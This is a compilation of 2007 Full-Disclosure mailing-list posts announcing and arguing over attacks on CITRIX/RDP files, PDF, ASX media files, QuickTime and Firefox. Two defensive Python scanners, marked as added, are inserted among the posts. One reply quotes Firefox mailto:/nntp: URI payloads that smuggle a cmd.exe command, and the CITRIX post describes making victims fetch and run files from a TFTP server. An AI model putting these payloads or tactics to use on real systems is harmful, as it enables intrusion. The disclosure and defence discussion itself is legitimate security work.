With software (bin) vulns you aren't only relying on a user or browser or anything. you have vulnerabilities in the server software or perimeter devices so you are cutting out any user interaction (which is a very important thing), but maybe i am caring too much about your wording of "by far the only".

Bin vulns are finer and there is no doubt about that. But you have to think creatively. You are banging on the front door which is guarded by god knows what. How is that for stealth? If you are spreading a worm, ok you have no problem with that but in case you want to penetrate a network you better think twice. First of all, you may fail. Second, you may lose all your hard work for nothing. You are giving away your well researched exploit. We have the tools to catch the little beast. It is different when it comes to XSS. XSS attacks can be tangled into the Web so deep that you won't be able to find them unless you have some sort of control over the remote servers, which you probably don't.
It is indirect, which means that you have to think several steps in advance, because the vector may take any form and place. Most of the tools are located on the Web. The data is on the Web, ok the Intranet, when it comes to corporate stuff, but it is still based on Web technologies. I am not sure if you agree with me but I always say that you have to pick the best tools for the job. So here is a question for you: If most of the data is based on Web technologies what tools would you use in order to get it? Buffer overflows? Come on, do you have any idea how relevant these vulnerabilities are when it comes to the Web. They represent in total 0.01%. On the other hand XSS represents 99%.. which one would you pick?

also with xss you are limited to the tasks that the web application can do unlike full control of the server which allows you to do whatever you want and allows for much deeper penetration into the network.

I agree but most of the time attackers are after the data not control over the server. This is so 1984. the people I've seen who use XSS today, have a vast background on traditional attack techniques
Re: [Full-disclosure] [EMAIL PROTECTED]
military grade exploits? :) dude, I am sorry man.. but you are living in some kind of a dream world. get real, most of the military hacks are as simple as bruteforcing the login prompt.. or trying something as simple as XSS. the reason XSS is soo neat is because it bypasses all firewalls... what?, your military grade exploit can do that? your military grade exploit can attack only the things that are visible from outside. if you want to sink into the stuff then do web hacking cuz it just works. btw, the reason I do mostly web hacking and information architecture, is because I love the topic and find it fascinating, something that you will never experience since you are looking for military grade exploits. find a job that you love and you will never work for the rest of your life, as they say... oh btw, maybe you can write a military grade exploit but you suck at other things... this is the real world. different people do different things and are experienced in different disciplines. that's why we do tiger-teams. or you can do all of it? :) no offense, right? I am just in a mood for philosophical conversations today. :) btw, this is your 3rd message on FD, right?

On 10/14/07, phioust [EMAIL PROTECTED] wrote:

I believe this discussion is about people who have real skills (which is why you are confused).. not "o so I couldn't finish my CS degree or function outside of computers so now I am doing XSS for a living". If XSS is the extent of your knowledge then I guess it will get food on your table but I think you should switch to this: http://www.securityfocus.com/archive/105 mailing list. and btw: needing someone to visit a webpage so you can xsrf isn't exactly military grade 0day nor is it stealthy (not that you would know anything about stealthy exploits) but i guess people jumped on it so much so that their cissp capable minds wouldn't be confused by sql injection [1].
I also do not know why you assume someone that doesn't consider lame XSS as an 'exploit' could not work professionally. Maybe you just have no skill and that's all your job requires of you?

[1] http://seclists.org/dailydave/2007/q4/0016.html

On 10/14/07, pdp (architect) [EMAIL PROTECTED] wrote: I really don't know what you refer to as an exploit.. :) and moreover, it is obvious that you have a lack of knowledge on what's more valuable nowadays. don't take it personally. do you work professionally?

-- pdp (architect) | petko d. petkov http://www.gnucitizen.org
Re: [Full-disclosure] [EMAIL PROTECTED]
you win man... I must have been mad to challenge you... check this out.. you are my hero of the day: http://www.gnucitizen.org/about/pdp#comment-58407

On 10/14/07, phioust [EMAIL PROTECTED] wrote:

On 10/14/07, pdp (architect) [EMAIL PROTECTED] wrote: military grade exploits? :) dude, I am sorry man.. but you are living in some kind of a dream world. get real,

So you pick apart three words of the message and the rest is null? you seem to follow techniques of the great valdis [1] when trying to defend worthless things (in this case your career).

most of the military hacks are as simple as bruteforcing the login prompt.. or trying something as simple as XSS.

Stop reading yahoo news

the reason XSS is soo neat is because it bypasses all firewalls

It doesn't bypass firewalls, it has nothing to do with them.. this is like saying you beat pax because you used sql injection to get cmd exec on a machine (something the selinux team probably has in their presentations).

... what?, your military grade exploit can do that? your military grade exploit can attack only the things that are visible from outside.

Or what about attacking the outside itself? Did you not see the core impact talk or were you too busy giving gadi a reach around by the pool?

if you want to sink into the stuff then do web hacking cuz it just works.

You mean do web hacking because you do not need any skills to look good and automated tools do it all for you. No thanks, I'll pass

different people do different things and are experienced in different disciplines.

To me this sounds like "i couldn't write an exploit for a strcpy bug so now I write xss code so i can still put hacker on my business card".

btw, this is your 3rd message on FD, right?

I guess I should whore the list more and then people will listen to me? Is this the secret to why gadi evron is still allowed to post here?

I am just in a mood for philosophical conversations today.
you should stay that way since you can't handle much else

[1] http://archives.neohapsis.com/archives/fulldisclosure/2007-05/0226.html

-- pdp (architect) | petko d. petkov http://www.gnucitizen.org
Re: [Full-disclosure] Remote Desktop Command Fixation Attacks
:-) CQ

-- pdp (architect) | petko d. petkov http://www.gnucitizen.org
Re: [Full-disclosure] Remote Desktop Command Fixation Attacks
not exist, it is because security in depth was not practiced. t

-Original Message- From: pdp (architect) [mailto:[EMAIL PROTECTED] Sent: Wednesday, October 10, 2007 4:15 AM To: full-disclosure@lists.grok.org.uk; [EMAIL PROTECTED] Subject: Remote Desktop Command Fixation Attacks

http://www.gnucitizen.org/blog/remote-desktop-command-fixation-attacks

Security in depth does not exist! No matter what you do, dedicated attackers will always be able to penetrate your network. Seriously! Information security is mostly about risk assessment and crisis management. When it comes to exploitative penetration testing, I rely on tactics rather than exploits. I've already talked about how insecure Remote Desktop service could be. In this post I will show you how easy it is to compromise a well protected Windows Terminal or CITRIX server with a simple social engineering attack and some knowledge about the platform we are about to exploit. The attack is rather simple. All the bad guys have to do is to compose a malicious RDP (for Windows Terminal Services) or ICA (for CITRIX) file and send it to the victim. The victim is persuaded to open the file by double clicking on it. When the connection is established, the user will enter their credentials to login and as such let the hackers in. Vicious! I have a more detailed explanation about the tactics behind this attack. Because I don't want to spam people with tons of text, I just included a link which you can follow. Hope that this is useful and at the same time eye opening, not that it is something completely amazing. But it does work and it works well. cheers.

-- pdp (architect) | petko d. petkov http://www.gnucitizen.org
Re: [Full-disclosure] Remote Desktop Command Fixation Attacks
gboyce, cheers... nice example! although I had something else in mind. maybe I shouldn't have used the term security in depth since your version differs a bit from mine. I guess different semantics. but yes, i agree that systems, processes, data, etc need to be separated and blended into a balanced mix which, as you said, while under attack, does not give away the keys to the kingdom. thanks

On 10/11/07, gboyce [EMAIL PROTECTED] wrote:

On Thu, 11 Oct 2007, pdp (architect) wrote:

Thor, with no disrespect but you are wrong. Security in depth does not work and I am not planning to support my argument in any way. This is just my personal humble opinion. I've seen only failure of the principles you mentioned. Security in depth works only in a perfect world. The truth is that you cannot implement true security mainly because you will hit on the accessibility side. It is all about achieving the balance between security and accessibility. Moreover, you cannot implement security in depth mainly because you cannot predict the future. Therefore, you don't know what kinds of attack will surface next. Security is not a destination, it is a process. Security in depth sounds like a destination to me.

The reason for security in depth is precisely because no security controls are foolproof. The point isn't to make a system completely unbreakable, but to raise the bar for what is required in order to extend their access beyond what they already control. Let's take a webserver as an example. Your webserver only requires ports 80 and 443 listening to the world, so you deploy a firewall in front of it restricting access to just those ports. A default install of the OS may enable a few other processes bound to remote ports like a mail server, portmap, etc. These processes aren't needed on this particular system. The firewall blocks access to them, but firewalls aren't perfect. The attacker may have found a way to get behind it. So you turn off those unneeded services.
Being a webserver, it's running a number of web applications. Since you don't want to place more trust in those applications than you have to, you chroot apache and have it run as a non-privileged user. Hopefully this will contain a successful compromise. But still, the attacker may break out of the chroot, so you make sure that you remove setuid applications or at least keep them up to date with the latest security updates. You do your best to keep them from becoming root. But even that may fail. Assuming all else has failed, this system is completely owned. But you have other systems with even more sensitive information. So you architect your network such that this webserver does not have more network privileges than it needs. You filter outbound network connections to hopefully block a good portion of botnet command and control functions. You block access from this webserver to other systems unless they have a need to talk to them. You implement application level firewalls between it and services that it does need to talk to. THIS is defence in depth. It's not about perfect security. It's about containing breaches. It's about blocking unnecessary risks. It's about making sure that a small mistake that you make does not hand over the keys to the kingdom. -- Greg

-- pdp (architect) | petko d. petkov http://www.gnucitizen.org
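A concrete check for the first layer in Greg's webserver example above (only 80 and 443 should be reachable from the network; anything else bound to every interface, such as the mail server or portmap, should be turned off rather than merely filtered). This is an added example, not code from the thread; the listener table is constructed and imitates `ss -ltn` output, which is an assumption about the input format.

```python
"""Audit a listener table against the exposure a public webserver should have.

Added example, not code from the thread. SAMPLE_SS_OUTPUT is constructed and
imitates `ss -ltn` output (assumption about the input format)."""
import ipaddress
import re
from dataclasses import dataclass

# Constructed sample: the two needed web ports, a mail server and portmap bound
# to all interfaces (the "default install" case), and two services correctly
# restricted to loopback.
SAMPLE_SS_OUTPUT = """\
State   Recv-Q  Send-Q  Local Address:Port   Peer Address:Port
LISTEN  0       128     0.0.0.0:80           0.0.0.0:*
LISTEN  0       128     [::]:443             [::]:*
LISTEN  0       100     0.0.0.0:25           0.0.0.0:*
LISTEN  0       128     *:111                *:*
LISTEN  0       128     127.0.0.1:3306       0.0.0.0:*
LISTEN  0       128     [::1]:6379           [::]:*
"""

# The only ports the firewall in front of the webserver is meant to expose.
ALLOWED_PUBLIC_PORTS = {80, 443}


@dataclass(frozen=True)
class Listener:
    address: str
    port: int

    def is_loopback(self) -> bool:
        # A loopback-bound socket stays unreachable even if the firewall fails.
        try:
            return ipaddress.ip_address(self.address).is_loopback
        except ValueError:
            return False  # "*" means every interface


# Local address column: "[v6]:port" or "v4-or-*:port".
_LOCAL_RE = re.compile(r"^(?:\[(?P<v6>[^\]]+)\]|(?P<v4>[^:\s]+)):(?P<port>\d+)$")


def parse_ss_listeners(text: str) -> list[Listener]:
    """Parse `ss -ltn`-style lines into Listener records, skipping the header."""
    listeners = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 5 or fields[0] != "LISTEN":
            continue
        m = _LOCAL_RE.match(fields[3])
        if not m:
            continue
        addr = m.group("v6") or m.group("v4")
        listeners.append(Listener(addr, int(m.group("port"))))
    return listeners


def exposed_listeners(listeners, allowed=ALLOWED_PUBLIC_PORTS):
    """Listeners reachable from the network that are not on the allowlist.

    The firewall is supposed to block these, but as the thread says it may not,
    so the service itself should be turned off."""
    return [l for l in listeners if not l.is_loopback() and l.port not in allowed]


def audit(text: str) -> dict[str, list[int]]:
    """Summarise ports by category so the result can be compared or asserted on."""
    listeners = parse_ss_listeners(text)
    return {
        "allowed": sorted({l.port for l in listeners
                           if not l.is_loopback() and l.port in ALLOWED_PUBLIC_PORTS}),
        "loopback_only": sorted({l.port for l in listeners if l.is_loopback()}),
        "exposed": sorted({l.port for l in exposed_listeners(listeners)}),
    }


if __name__ == "__main__":
    for category, ports in audit(SAMPLE_SS_OUTPUT).items():
        print(f"{category:14} {ports}")
```

On a real host, feed it the output of `ss -ltn` instead of the constructed sample; anything in the "exposed" list is a service the firewall is being trusted to hide.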
[Full-disclosure] Remote Desktop Command Fixation Attacks
http://www.gnucitizen.org/blog/remote-desktop-command-fixation-attacks

Security in depth does not exist! No matter what you do, dedicated attackers will always be able to penetrate your network. Seriously! Information security is mostly about risk assessment and crisis management. When it comes to exploitative penetration testing, I rely on tactics rather than exploits. I've already talked about how insecure Remote Desktop service could be. In this post I will show you how easy it is to compromise a well protected Windows Terminal or CITRIX server with a simple social engineering attack and some knowledge about the platform we are about to exploit. The attack is rather simple. All the bad guys have to do is to compose a malicious RDP (for Windows Terminal Services) or ICA (for CITRIX) file and send it to the victim. The victim is persuaded to open the file by double clicking on it. When the connection is established, the user will enter their credentials to login and as such let the hackers in. Vicious! I have a more detailed explanation about the tactics behind this attack. Because I don't want to spam people with tons of text, I just included a link which you can follow. Hope that this is useful and at the same time eye opening, not that it is something completely amazing. But it does work and it works well. cheers.

-- pdp (architect) | petko d. petkov http://www.gnucitizen.org
[Full-disclosure] 0day: Hacking secured CITRIX from outside
http://www.gnucitizen.org/blog/0day-hacking-secured-citrix-from-outside

In the true spirit of GNUCITIZEN half(partial)-disclosure initiative, we announce that it is possible to gain user access level on integrated remote CITRIX servers. The bug/feature does not rely on any client/server vulnerabilities nor client/server misconfiguration issues. All an attacker needs to do to exploit the weakness is to lure a victim, part of an integrated network, to a malicious website or trick them into opening specially crafted ICA files. The attack results in remote command execution with the access level of the current user. The success of the attack relies on the fact that the victim (the proxy) is part of a CITRIX ring to which he/she can perform pass through authentication. Once a connection is instantiated, the victim will unwillingly and transparently login into CITRIX and perform several commands specified by the attacker. The attacker can simply instruct the remote desktop to download files from a remote TFTP server and execute them locally. Once the attack is performed, the local connection is terminated and the CITRIX session is cleared. No user interaction is required! CAUTION!!! The attack can be used to circumvent/bypass border firewalls and sneak into private networks. This attack is of type CSRF (Cross-Site Request Forgery), although it does not rely on Web bugs. The attack vector works flawlessly on IE and Firefox (when configured correctly). It also works with any email client or other types of file sharing mechanisms. All versions of CITRIX and CITRIX client are affected. The attack may fail on certain setups. If you manage to re-discover the type of vulnerability outlined in this post, we encourage you to keep it private. Give some time for the folks at CITRIX to react. Currently, I am not aware of any remedy against the attack.
Given CITRIX's popularity among corporations and big organizations, it is highly recommended to take this warning with extra caution.

-- pdp (architect) | petko d. petkov http://www.gnucitizen.org
[Full-disclosure] are the NetBIOS-like hacking days over? - wide open citrix services on critical domains
The other day I was performing some CITRIX testing, so I had a lot of fun with hacking into GUIs, which, as most of you probably know, are trivial to break into. I did play around with .ICA files as well, just to make sure that the client is not affected by some obvious client-side vulnerabilities. This exercise led me to reevaluate a great many things about ICA (Independent Computing Architecture). When querying Google and Yahoo for public .ICA files, I was presented with tons of wide open services, some of which were located on .gov and .mil domains. This is madness! No, this is the Web. Though, I wasn't expecting what I have found. Hacking like in the movies? I did not poke any of the services I found, although it is obvious what is insecure and what is not when it comes to CITRIX. It is enough to look into the ICA files. With a few lines in bash combined with my Google python script, I was able to dump all the ICA files that Google knows about and do some interesting grepping on them. What I discovered was unbelievable. Shall we start with the Global Logistics systems or the US Government Federal Funding Citrix portals - all of them wide open and susceptible to attacks. Again, no poking on my side, just simple observation exercises on the information provided by Google. Just by looking into Google, I was able to find 114 wide open CITRIX instances: 10 .gov, 4 .mil, 20 .edu, 27 .com, etc… The research was conducted offline, therefore there might be some false positives. Among the services discovered, there were several critical applications which looked so interesting that I didn't even dare look at their ICA files. I am trying to raise the consumer awareness with this article. I mean, it is 2007 people, it shouldn't be that simple.
I did write an article about my findings which you can read from here: http://www.gnucitizen.org/blog/citrix-owning-the-legitimate-backdoor/ I've also created a video that shows the lamest way someone can use to break into unprotected CITRIX just to show the concepts. CITRIX hacking is just like back in the old days with NetBIOS. It's simple. It is malicious. It is highly effective. And the problem is that CITRIX is pretty useful. Here is a dilemma for you: Let's say that you have a pretty stable desktop app which you would like to be available on the Web. What you gonna do? Port it to XHTML, JavaScript and CSS? No way! You are most likely going to put it over CITRIX. I've also written a script which makes use of the ICAClient ActiveX controller to enumerate remote Applications, Servers and Farms: http://www.gnucitizen.org/blog/citrix-owning-the-legitimate-backdoor/enum.js Let me know if you find this useful. cheers

-- pdp (architect) | petko d. petkov http://www.gnucitizen.org
Re: [Full-disclosure] 0day: PDF pwns Windows
back online - too many users ..

On 9/21/07, Rohit Srivastwa [EMAIL PROTECTED] wrote:

And your website is down at this moment http://www.gnucitizen.org/ 403 http://www.gnucitizen.org/blog/ 403 http://www.gnucitizen.org/blog/0day-pdf-pwns-windows 404 Is it a reverse attack by someone hurt :)

--Through the Firewall, Out the Router, Down the T1, Across the Backbone, Bounced from Satellite Nothing but the Internet

- Original Message From: pdp (architect) [EMAIL PROTECTED] To: [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk Sent: Thursday, September 20, 2007 6:51:33 PM Subject: [Full-disclosure] 0day: PDF pwns Windows

http://www.gnucitizen.org/blog/0day-pdf-pwns-windows

I am closing the season with the following HIGH Risk vulnerability: Adobe Acrobat/Reader PDF documents can be used to compromise your Windows box. Completely!!! Invisibly and unwillingly!!! All it takes is to open a PDF document or stumble across a page which embeds one. The issue is quite critical given the fact that PDF documents are in the core of today's modern business. This and the fact that it may take a while for Adobe to fix their closed source product, are the reasons why I am not going to publish any POCs. You have to take my word for it. The POCs will be released when an update is available. Adobe's representatives can contact me from the usual place. My advice for you is not to open any PDF files (locally or remotely). Other PDF viewers might be vulnerable too. The issue was verified on Windows XP SP2 with the latest Adobe Reader 8.1, although previous versions and other setups are also affected. A formal summary and conclusion of the GNUCITIZEN bug hunt is to be expected soon. cheers

-- pdp (architect) | petko d. petkov http://www.gnucitizen.org
[Full-disclosure] 0day: PDF pwns Windows
http://www.gnucitizen.org/blog/0day-pdf-pwns-windows

I am closing the season with the following HIGH Risk vulnerability: Adobe Acrobat/Reader PDF documents can be used to compromise your Windows box. Completely!!! Invisibly and unwillingly!!! All it takes is to open a PDF document or stumble across a page which embeds one. The issue is quite critical given the fact that PDF documents are in the core of today's modern business. This and the fact that it may take a while for Adobe to fix their closed source product, are the reasons why I am not going to publish any POCs. You have to take my word for it. The POCs will be released when an update is available. Adobe's representatives can contact me from the usual place. My advice for you is not to open any PDF files (locally or remotely). Other PDF viewers might be vulnerable too. The issue was verified on Windows XP SP2 with the latest Adobe Reader 8.1, although previous versions and other setups are also affected. A formal summary and conclusion of the GNUCITIZEN bug hunt is to be expected soon. cheers

-- pdp (architect) | petko d. petkov http://www.gnucitizen.org
Re: [Full-disclosure] 0day: PDF pwns Windows
My upcoming research features everything regarding this and the issue you have already discussed.

really :).. which one... the one from last year?

On 9/20/07, Aditya K Sood [EMAIL PROTECTED] wrote:

pdp (architect) wrote:

http://www.gnucitizen.org/blog/0day-pdf-pwns-windows I am closing the season with the following HIGH Risk vulnerability: Adobe Acrobat/Reader PDF documents can be used to compromise your Windows box. Completely!!! Invisibly and unwillingly!!! All it takes is to open a PDF document or stumble across a page which embeds one. The issue is quite critical given the fact that PDF documents are in the core of today's modern business. This and the fact that it may take a while for Adobe to fix their closed source product, are the reasons why I am not going to publish any POCs. You have to take my word for it. The POCs will be released when an update is available. Adobe's representatives can contact me from the usual place. My advice for you is not to open any PDF files (locally or remotely). Other PDF viewers might be vulnerable too. The issue was verified on Windows XP SP2 with the latest Adobe Reader 8.1, although previous versions and other setups are also affected. A formal summary and conclusion of the GNUCITIZEN bug hunt is to be expected soon. cheers

Hi, Your point is right. But there are a number of factors other than this in exploiting pdf in other sense. My latest research is working over the exploitation of PDF. Even if you look at the core then there are no restrictions on READ in PDF in most of the versions. Only outbound data is filtered to some extent. you can even read /etc/passwd file from inside of PDF. Other infection vectors include infection through Local Area Networks through sharing and printing PDF docs and all. My upcoming research features everything regarding this and the issue you have already discussed. Regards Aks http://ww.secniche.org

-- pdp (architect) | petko d. petkov http://www.gnucitizen.org
Re: [Full-disclosure] security notice: Backdooring Windows Media Files
back online... too many visitors lately

On 9/19/07, Rahul Mohandas [EMAIL PROTECTED] wrote:
Could someone send me the POCs please if you have a local copy. Gnucitizen.org is not accessible for me.
Thanks

- Original Message -
From: pdp (architect) [EMAIL PROTECTED]
To: Memisyazici, Aras [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk
Sent: Wednesday, September 19, 2007 12:30 AM
Subject: Re: security notice: Backdooring Windows Media Files
[...]

-- pdp (architect) | petko d. petkov http://www.gnucitizen.org
[Full-disclosure] security notice: Backdooring Windows Media Files
http://www.gnucitizen.org/blog/backdooring-windows-media-files

It is very easy to put some HTML inside files supported by Windows Media Player. The interesting thing is that these HTML pages run in a less restrictive IE environment. I found that a fully patched Windows XP SP2 with IE6 or IE7 and Windows Media Player 9 (default) will open any page of your choice in IE even if your default browser is Firefox, Opera or anything else you have in place. It means that even if you are running Firefox and you think that you are secure, by simply opening a media file, you expose yourself to all IE vulnerabilities there might be. Plus, attackers can perform very very interesting phishing attacks.

I prepared a simple POC which spawns a browser window in full screen mode... Think about how easy it is going to be to fake the Windows logout - login sequence and phish unaware users' credentials: http://www.gnucitizen.org/projects/backdooring-windows-media-files/poc02.asx

On the other hand, Media Player 11 (Vista by default) is not exposed to these attacks.

-- pdp (architect) | petko d. petkov http://www.gnucitizen.org
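The post says the POC is an .asx playlist that pulls HTML into the player, but does not name the mechanism. The scanner below is an added example, not the POC from the post: it assumes that the HTMLView PARAM (a documented ASX element that makes the player render a web page) and REF entries pointing at web-page URLs are the things a defender wants to flag before a playlist reaches a user. The two playlists are constructed for the example; the host names are placeholders.

```python
"""Scan an ASX playlist for entries that would make Windows Media Player
load a web page rather than a media stream (added example, not the
post's POC; which entries to flag is this example's assumption)."""
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Heuristic: a REF whose path looks like a web page, not a media file.
WEB_PAGE_EXTENSIONS = (".htm", ".html", ".asp", ".aspx", ".php")


class AsxScanner(HTMLParser):
    """ASX is HTML-like, case-insensitive markup, so HTMLParser (which
    lower-cases tag and attribute names) fits better than an XML parser."""

    def __init__(self):
        super().__init__()
        self.findings = []  # list of (reason, url)

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "param" and a.get("name", "").lower() == "htmlview":
            # HTMLView tells the player to render a web page in its own
            # embedded browser while the entry plays.
            self.findings.append(("htmlview", a.get("value", "")))
        elif tag == "ref":
            href = a.get("href", "")
            if urlsplit(href).path.lower().endswith(WEB_PAGE_EXTENSIONS):
                self.findings.append(("ref-to-web-page", href))


def scan_asx(text):
    """Return a list of (reason, url) findings for one playlist."""
    scanner = AsxScanner()
    scanner.feed(text)
    scanner.close()
    return scanner.findings


# Constructed sample playlists (placeholder hosts).
BENIGN_ASX = """<ASX version="3.0">
  <ENTRY><REF HREF="http://media.example.invalid/track1.wma" /></ENTRY>
</ASX>"""

SUSPICIOUS_ASX = """<ASX version="3.0">
  <ENTRY>
    <PARAM NAME="HTMLView" VALUE="http://untrusted.example.invalid/fullscreen.html" />
    <REF HREF="http://media.example.invalid/track1.wma" />
  </ENTRY>
  <ENTRY><REF HREF="http://untrusted.example.invalid/page.html" /></ENTRY>
</ASX>"""

if __name__ == "__main__":
    for name, playlist in (("benign", BENIGN_ASX), ("suspicious", SUSPICIOUS_ASX)):
        print(name, scan_asx(playlist))
```

The extension list is a heuristic, not a guarantee: a REF that redirects server-side to a page would not be caught by looking at the path alone, so this belongs on a mail or web gateway as one signal among others rather than as the only control.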
Re: [Full-disclosure] security notice: Backdooring Windows Media Files
yes, of course :) but u are running Windows Media Player 11 which is not the default one for Windows XP SP2. Moreover, this Media Player edition has not slipped through any software update either. Therefore, if you are not a Media Player fan, you will never get this version on a fully patched XP SP2 machine. I tend to use iTunes on XP SP2, so yes I am vulnerable.

On 9/18/07, Memisyazici, Aras [EMAIL PROTECTED] wrote:
Hi pdp! Great admirer of your work :) I just wanted to inform you that I have tested your claim on a fully patched/updated Win XP SP2 system with an admin account logged in, and was warned sufficiently (asked whether I wanted to play asx files, then asked if I was sure by Media Player, then the pop-up was blocked by IE), while the page you tried to produce was blocked via IE's pop-up blocker. You can see/confirm this by viewing these screenshots: http://preview.tinyurl.com/34xpcz (http://i189.photobucket.com/albums/z159/vtknightmare/noworkie1.png) and http://preview.tinyurl.com/34jx5v (http://i189.photobucket.com/albums/z159/vtknightmare/noworkie2.png). This was tested on a plain/manila/vanilla version of XP SP2. All I did was update/upgrade to the latest available from M$ Update.

Sincerely,
Aras Memisyazici
IT/Security/Dev. Specialist
Outreach Information Services
Virginia Tech

-Original Message-
From: pdp (architect) [mailto:[EMAIL PROTECTED]
Sent: Tuesday, September 18, 2007 11:58 AM
To: [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk
Subject: security notice: Backdooring Windows Media Files
http://www.gnucitizen.org/blog/backdooring-windows-media-files [...]

-- pdp (architect) | petko d. petkov http://www.gnucitizen.org
[Full-disclosure] IE (Internet Explorer) pwns SecondLife
http://www.gnucitizen.org/blog/ie-pwns-secondlife

IE (Internet Explorer) pwns SecondLife. Before going into details of why and how it happens, I would like to bring your attention to SecondLife for a moment. For those of you who don't follow cutting edge technologies, SecondLife is a massive virtual world located on a couple of hundred workstations on-line. The cool thing about SecondLife is that you can do all kinds of things like expressing your artistic side, communicating and of course doing business. There is a lot of money in SecondLife. Not that long ago, there was this girl who made $100 (a million) out of the on-line world. This means that today crooks are after your virtual persona rather than your physical self. Therefore, security in virtual worlds is almost as important as security in the physical world.

Now let's get back to the real issue. Attackers can steal the victim's login credentials, therefore hijacking their virtual persona, by simply tricking them into visiting a malicious Web page. It is automatic and the user doesn't have to do anything (no user interaction is required). I would rate this issue as Medium risk, although if the victim has a lot of Linden dollars ($L) then the situation becomes quite critical. At the time of writing 1$ can be exchanged for 268.15$L.

So, let's stop thinking in only one dimension for a moment. Compromising the integrity of the browser or the operating system is cool but is it really worth it? Attackers are after your money, not your pictures or school essays. Think about this for a second.

cheers

-- pdp (architect) | petko d. petkov http://www.gnucitizen.org
[Full-disclosure] 0DAY: QuickTime pwns Firefox
http://www.gnucitizen.org/blog/0day-quicktime-pwns-firefox

It seems that QuickTime media formats can hack into Firefox. The result of this vulnerability can lead to full compromise of the browser and maybe even the underlying operating system. Don't try this at home. In practice I can do anything with the browser, like installing browser backdoors, and the operating system if the victim is running with administrative privileges. However, just for the sake of this demonstration, I simply open calc.exe. Keep in mind that the exploit is cross-platform. Check the link above for a demonstration and more information on how the exploit works.

-- pdp (architect) | petko d. petkov http://www.gnucitizen.org
[Full-disclosure] How to make money with XSS
http://www.gnucitizen.org/blog/how-to-make-money-with-xss

Finding XSS is a dead easy task. Everybody is vulnerable to this type of issue and even if there are protection mechanisms in place such as application firewalls and sanitization filters, very often attackers can get a stable exploit working in a matter of a couple of minutes. In fact, I don't think that there are unstable XSS exploits. It is not like the attacker has to manipulate the stack or a corrupted heap in order to get some sort of execution control. No! It is a simple injection issue. So the question is not whether the bad guys can find an XSS issue on your site/application - they can and they will. The question is what sort of things they can do with it.

-- pdp (architect) | petko d. petkov http://www.gnucitizen.org
[Full-disclosure] WHITE PAPER: For my next trick… hacking Web2.0
After several months spent in research on Web2.0 insecurities I've decided to sit down and write a whitepaper. The paper quickly became rather blurred due to the enormous amount of notes I've collected on this subject. This is the reason why it was later restructured into stories, which provide a lot better medium for understanding the content.

http://www.gnucitizen.org/projects/for-my-next-trick-hacking-web20/
http://www.gnucitizen.org/projects/for-my-next-trick-hacking-web20/web2.0hacking.pdf
http://docs.google.com/Doc?id=dfpvfkxn_48f87xsv

For some, Web2.0 symbolizes the start of a new era of the Web; for others it is merely a marketing buzzword designed to hook unaware venture capitalists on the Web2.0 hype. The term Web2.0 appeared for the first time in 2003 at a conference organized by O'Reilly Media. The event, simply titled Web 2.0, attempted to reference the second generation of web technologies such as social communities, server oriented architectures, Wikis, blogs, collaborative environments, AJAX, etc. Since then the term has become widely adopted across the entire Web industry and it has been used ever since to describe innovation. In simple words, Web2.0 outlines the technological, philosophical and social superset of what we used to know as just the Web. Although we know that the Web is not bound to any version number, it makes our lives a lot easier to do so, so we can refer to a particular set of features. The features of the Web2.0 era are rather blurred due to the enormous amount of different opinions on the matter, but we all agree that they must include things such as feeds, data aggregators, collaborative environments, social networks, client-side technologies and SOA (Server Oriented Architecture). Although Web2.0 has improved our ability to freely communicate and share via the means of the Net, it has brought some unimaginable dangers and as a result it is insecure.

Web2.0 security is very much a collection of every single security aspect of its components. On their own they are just simple system abnormalities, but when put together they create a problem worth our attention. In this paper we are going to outline some of the dangers of Web2.0 by combining fictional stories with technology that is real. Each story begins with a prologue, which introduces the problem, and finishes with a conclusion, which summarizes the attack techniques that are described within the story context.

Cheers

-- pdp (architect) | petko d. petkov http://www.gnucitizen.org
[Full-disclosure] Facebook Homepage Source Code Probably Leaked
http://www.gnucitizen.org/blog/facebook-homepage-source-code-probably-leaked/

It seems that Facebook's homepage source code was leaked. This is yet to be confirmed by Facebook themselves, so do not take it for real. I've spent a couple of moments reading the single PHP file and there is nothing wrong with it that is obvious to me at this stage, apart from the fact it gives us a pretty good idea how the software is structured and where to find interesting libraries and other components of the Facebook application. If you find anything interesting please send it to us privately, or I would suggest contacting Facebook straightaway.

cheers

-- pdp (architect) | petko d. petkov http://www.gnucitizen.org
[Full-disclosure] Sunday Morning Spam: Intel Video Ad on Security, directed by Christopher Guest
http://www.gnucitizen.org/blog/intel-video-ad-on-security-directed-by-christopher-guest

the video is quite interesting I must say.

-- pdp (architect) | petko d. petkov http://www.gnucitizen.org
Re: [Full-disclosure] FIREFOX 2.0.0.5 new vulnerability
works like a charm :) ?

On 7/25/07, Mesut EREN [EMAIL PROTECTED] wrote:
Hi all,
FF 2.0.0.5 new remote code execution vulnerability. I tested FF 2.0.0.5, but the code doesn't work. Example code is:
mailto:%00%00../../../../../../windows/system32/cmd.exe ../../../../../../../../windows/system32/calc.exe - blah.bat
nntp:%00%00../../../../../../windows/system32/cmd.exe ../../../../../../../../windows/system32/calc.exe - blah.bat
What am I missing?

Mesut EREN
BAŞAK ÇATI CEPHE SİSTEMLERİ
IT Officer
MCSA:S, MCSE:S, CEH, CCNA
[EMAIL PROTECTED]

-- pdp (architect) | petko d. petkov http://www.gnucitizen.org
Re: [Full-disclosure] [Owasp-leaders] new version of XSSDB
Hi Dinis,

we are working on offline support with Google Gears - once you visit the application, it will be cached and the database will be synchronized on your PC. Then you can use it whenever you don't have Internet connectivity. We are also planning to release a standalone version for Adobe AIR.

Thanks for the interest

On 7/23/07, Dinis Cruz [EMAIL PROTECTED] wrote:
This is very good stuff. And it really shows the power of XSS. Anybody with some cycles to add offline support for this (maybe retrieving the RSS from the local disk)?

Dinis Cruz
Chief OWASP Evangelist
http://www.owasp.org

On 7/21/07, pdp (architect) [EMAIL PROTECTED] wrote:
Hi there, GC has released a new version of XSSDB (http://www.gnucitizen.org/xssdb). [...]

-- pdp (architect) | petko d. petkov http://www.gnucitizen.org
Re: [Full-disclosure] [WEB SECURITY] digital stalking, Google SearchHistory RSS Interface
